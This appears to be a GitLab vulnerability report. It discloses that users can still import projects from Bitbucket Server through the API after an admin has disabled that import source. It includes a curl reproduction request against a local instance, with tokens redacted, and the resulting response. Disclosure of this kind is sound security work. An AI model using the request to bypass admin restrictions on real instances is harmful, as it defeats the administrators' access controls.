Bypass Disabled Bitbucket Server import source Project Creation
Summary
As an admin, you can disable Bitbucket Server
import source in admin page https://:gitlab_instance/admin/application_settings
However the user can still import project by using API This issue is similar to #29748 (closed)
Steps to reproduce
- As an admin, disable
Bitbucket Server
import source in/admin/application_settings/general
underVisibility and access controls
- As a regular user, run the following curl command:
➜ curl --request POST \
--url "http://localhost:3000/api/v4/import/bitbucket_server" \
--header "content-type: application/json" \
--header "PRIVATE-TOKEN: [REDACTED by nmalcolm]" \
--data '{
"bitbucket_server_url": "http://localhost:7990",
"bitbucket_server_username": "admin",
"personal_access_token": "[REDACTED by nmalcolm]",
"bitbucket_server_project": "FOO",
"bitbucket_server_repo": "bish"
}'
where:
-
http://localhost:3000
- is local gitlab instance -
http://localhost:7990
- is local bitbucket server instance (requests to localhost/local networks are allowed for this test)
In my case I got the response
{"id":25,"name":"BISH","full_path":"/root/BISH","full_name":"Administrator / BISH","import_source":"http://localhost:7990/projects/FOO/repos/bish/browse","import_status":"scheduled","human_import_status_name":"scheduled","provider_link":"http://localhost:7990/projects/FOO/repos/bish/browse"}
and the project was imported anyway.
Impact
Bypass project creation despite the admin setting explcitily disallow it
What is the current bug behavior?
Bypass project creation despite the admin setting explcitily disallow it
Edited by Nick Malcolm